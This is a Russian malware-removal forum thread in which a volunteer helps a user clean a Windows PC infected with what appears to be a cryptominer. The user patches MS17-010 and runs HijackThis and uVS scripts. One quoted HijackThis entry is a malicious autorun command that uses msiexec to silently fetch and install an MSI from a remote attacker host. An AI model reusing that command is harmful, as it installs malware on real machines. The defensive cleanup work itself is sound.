"Mysa" и "ok" в автозагрузке + проблемы с сетью

[n1x3r]

Здравствуйте!

Возникли проблемы. Судя по всему, "Avast" пропустил какую-то бяку:
- количество запущенных процессов зашкаливает;
- в автозагрузке числились неизвестные 4 задачи с названием "Mysa", а также какой-то "ok";
- что-то активно съедает трафик, т.к. работа в сети сильно затруднена.

Предварительно чистил, но я в этом не спец. Поэтому прошу вашей помощи, ребята.

[Info_bot]

Уважаемый(ая) n1x3r, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O4 - HKLM\..\Run: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q

Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya - MS17-010: Описание обновления безопасности для Windows SMB Server срочно устанавливайте, причём на всех компьютерах в сети, если их несколько. Иначе не избавитесь от майнера.

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

[n1x3r]

Спасибо за ответ!

Вроде бы все сделал. Службы безопасности "Винды" обновил сразу перед запросом, почитав на вашем форуме информацию с подобной проблемой.
Архив прикрепил и ожидаю дальнейших инструкций.

[Vvvyg]

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):

Код:

;uVS v4.0.9 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
regt 25
deltmp
apply
restart

Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Удалите все установленные версии Java, они устаревшие и со множеством критических уязвимостей.
Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите Java 8 Update 141.
Учтите, что 64-bit версия Java нужна только для очень ограниченного круга приложений.

Сообщите, что с проблемой.

[n1x3r]

Спасибо! Сделал и прикрепляю вам архив.

По поводу "Java" понял - поправлю. С ситуацией не понятно - продолжаю за ней наблюдать. Трафик вроде бы не скачет и работа нормализовалась еще перед запросом, когда чистил самостоятельно. Плюс в "планировщике" ничего сомнительного с того момента не появлялось.

И тем не менее, меня все также смущает количество процессов в диспетчере задач: их очень много, а если отключить галку "Отображать процессы всех пользователей" то можно решить, что это не обычный домашний компьютер, а какая-то локальная сеть. Некоторые процессы дублируются и, например, svchost насчитал вообще 10 шт. (3 шт. - система, 3 шт. - Network Service, а остальные - Local Service).

Развейте мои сомнения, пожалуйста, или подтвердите опасения, а то скоро стану параноиком.

P.S. Wi-fi отсутствует - кабельная проводка и поэтому сторонних подключений быть не может.

[Vvvyg]

Если коротко - всё в порядке. Просто раньше на процессы так пристально не смотрели.

[n1x3r]

Вас понял, спасибо! В таком случае, если все чисто и хвостов нет, от души благодарю за консультативную поддержку и проверку "железяки".

Искренне желаю процветания вашему проекту и попутного ветра во все паруса - с меня причитается, ребята!